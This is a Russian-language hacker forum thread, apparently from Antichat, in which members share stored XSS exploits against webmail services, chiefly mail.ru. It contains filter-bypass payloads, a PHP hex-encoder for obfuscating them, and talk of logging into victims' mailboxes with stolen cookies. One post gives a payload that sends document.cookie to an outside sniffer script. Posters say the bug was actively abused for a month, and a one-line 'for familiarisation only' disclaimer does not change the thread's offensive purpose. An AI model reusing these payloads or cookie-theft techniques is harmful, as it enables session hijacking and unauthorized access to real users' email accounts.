Скажу более... если ента тема протолкнётся дальше в одном из мыльников, то пипец ваще будет. Правда там с кодировкой надо поиграть. Ваще Дронга молодца! В копилке XSS на мыльниках от тебя (кажись и от МАЙОРа) +1
Хех дронга XSS не работает на yandex'e так что прикольно что нашёл на яндексе. Блин я так старался видео сделать что мне не кто не что не добавят. А воще я так и предполагал что гринам,модерам,админам,Мемберам. Не будет это интересно потому что они самые умные =))
ахаха, джордан - гений, поставлю репу, если напишешь в форуме ну хотя б в этом разделе отдельный топик... простейший hex-encoder: PHP: <? $str = str_replace("%20", "", $QUERY_STRING); for ($i=0; $i<strlen($str); $i++) { $hex=dechex(ord($str[$i])); if ($str[$i]=='&') echo "$str[$i]"; else if ($str[$i]!='\\') echo "%$hex"; } ?>
XSS Tester неплохая прога - заюзай поиск по форуму... + а у меня нормально на мыло заходит... ну пока помучаем рамблер)
Можешь с rambler.ru, можешь в ЗеБате (Параметры-Формат сообщения) или Оутлуке. XSS Tester -> http://www.forum.antichat.ru/attachment.php?attachmentid=175
вот на мэйл.ру залезть с кукой - все понятно: или CookieEditor или AccessDiver... - на рамблере блин в куке всего 1 значение показывает CookieEditor (ruid), когда приходит где-то 5... - через дайвер пробовал по рефереру зайти + кука - редиректит на rambler.ru
Спасибо всем за старания товарищи, бага не актуальна. Сегодня её прикрыли. Месяц она жила, думаю многие неплохо погрелись на этом. Можно конечно выложить ещё одну и я бы сделал это если бы тут умели хранить секреты. Пальцем ни в кого не тыкаю, но не очень приятно когда ко мне в асю стучатся левые люди и показывают мне мою же Xss... Делаем выводы господа. Всем ещё раз спасибо.
Дронга, не отчаивайся друг. Все летает как по маслу! Админы mail.ru не такие умные люди. Щас катит всебраузеровый вариант: PHP: <img/src='http://////>>>>>\&#+39 style='display:none;&#+39 onerror=confirm()> тестил только что, спасибо в репе, если я помог
Да помог то помог, только не мне, опять всё повторится... И помоему это не для всех браузеров, сейчас погляжу. Дело в img/src - эту конструкцию не все браузеры принимают, IE на ура, а вот остальные не примут вроде.
Решено спустить в общее. Думаю, Всем будет интересно почитать историю лома mail.ru. Кстати, данные ХSS работают на других менее "продвинутых" почтовиках Удачных подвигов! Помните, данная информация предназначена только для ознакомления. Мы не рекомендуем Вам испытывать данные XSS-эксплоиты. Powered by Antichat.ru
Наконец-то в паблике =) Сколько шуму было из этой темы. Как раз на момент её создания alsa основал АМА (пожалуй, самый закрытый на сегодня раздел) и я был первым кто в него зашел и первым моим постом в абсолютно пустом разделе стала усовершенствованная XSS. Так хотелось приписать "Первый нах!", ну вы понимаете, момент ведь исторический. На открытие опять-таки навел Майор, он уже всё обыграв в голове и поняв просто спросил, почему работает это: HTML: <font color="green>"style="font-size:1px;background:url\(java/**/script:alert('XSS by Dronga'))"> .... И меня осенило =) Вот так всё и получается. HTML: <img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')> Вот она работала под всеми браузерами, включая FF. Это была бомба к которой имели доступ всего 9 человек с форума =) Фильтр терялся когда в атрибуте натыкался на закрывающий тег знак > и после него уже не смотрел.. А с точки зрения браузера всё что в кавычках - это атрибут. Поэтому генерилась ошибка и добавив обработчик onerror мы добивались своего =) Из МОА никто не догадался, хотя всё было у них перед глазами) Пусть теперь все видят и знают что и как обсуждается в закрытых разделах. Ну и конечно стремятся туда. Кстати, из всего этого материала рукой подать до ещё одной активной XSS, но только под IE (Greetz to ZaCo =) Удачи, господа)
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')> ,подскажите пожалуйста,что надо вставлТь вместо xss ?
Вообще вот такая запись: HTML: <img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')> Это просто наглядно, а вариаций тут может быть куча, можете попробовать даже вот так: HTML: <img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert(1)> <img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('2')> <img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('3')> Просто дело вашей фантазии. Отвечаю на вопрос: HTML: <img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=document.images[0].src="http://www.link.com/script_sniffer.php?cooki="+document.cookie;> Что-то около того)
..... Не могу понять почему не срабатывает... HTML: <img src=\"xss\" width=0 height=0 style=\"top:expression(eval(this.sas));\" width=0 height=0 sas=\"this.src=\'xss\' document.cookie;this.sas=null\" alt=\'\'> Вот этот код после майловского фильтра... HTML: <img src=\"xss\" width=0 height=0 xstyle=\"top:expression(eval(this.sas));\" width=0 height=0 sas=\"this.src=\"xss\" document.cookie;this.sas=null\" alt=\"\">
Не пойму, но как это все провети? не пойму отправляю письмо в вижео хтмл с кодом? обоснуйте по полочкам, плз
